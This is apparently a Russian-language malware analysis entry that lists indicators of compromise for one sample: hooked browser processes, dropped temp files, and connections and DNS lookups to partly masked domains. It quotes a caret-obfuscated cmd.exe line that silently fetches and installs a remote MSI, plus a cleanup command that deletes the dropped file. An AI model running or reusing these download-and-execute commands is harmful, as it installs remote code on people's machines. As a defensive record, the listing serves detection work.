Техническая информация
- '<SYSTEM32>\cmd.exe' /C m^SiE^x^e^c /i http://fa###finn.com/admin/445210.msi /qn
- %WINDIR%\explorer.exe
- iexplore.exe
- Процесс firefox.exe, модуль nss3.dll
- Процесс iexplore.exe, модуль wininet.dll
- %TEMP%\nswadfb.tmp
- %TEMP%\2eoik3pykhpncgp2bjw
- %TEMP%\z9ayknxao2kgy4f4
- %TEMP%\nsrae2b.tmp\73cy5.dll
- %WINDIR%\installer\msiad04.tmp
- 'fa###finn.com':80
- 'ca##v.com':80
- 'zz##p.com':80
- '11##js.com':80
- 'or####organical.com':80
- DNS ASK fa###finn.com
- DNS ASK ca##v.com
- DNS ASK zz##p.com
- DNS ASK 11##js.com
- DNS ASK or####organical.com
- DNS ASK me###erps.com
- '%WINDIR%\installer\msiad04.tmp'
- '<SYSTEM32>\cmd.exe' /C m^SiE^x^e^c /i http://fa###finn.com/admin/445210.msi /qn' (со скрытым окном)
- '<SYSTEM32>\msiexec.exe' /i http://fa###finn.com/admin/445210.msi /qn
- '%WINDIR%\syswow64\colorcpl.exe'
- '%WINDIR%\syswow64\cmd.exe' del "%WINDIR%\Installer\MSIAD04.tmp"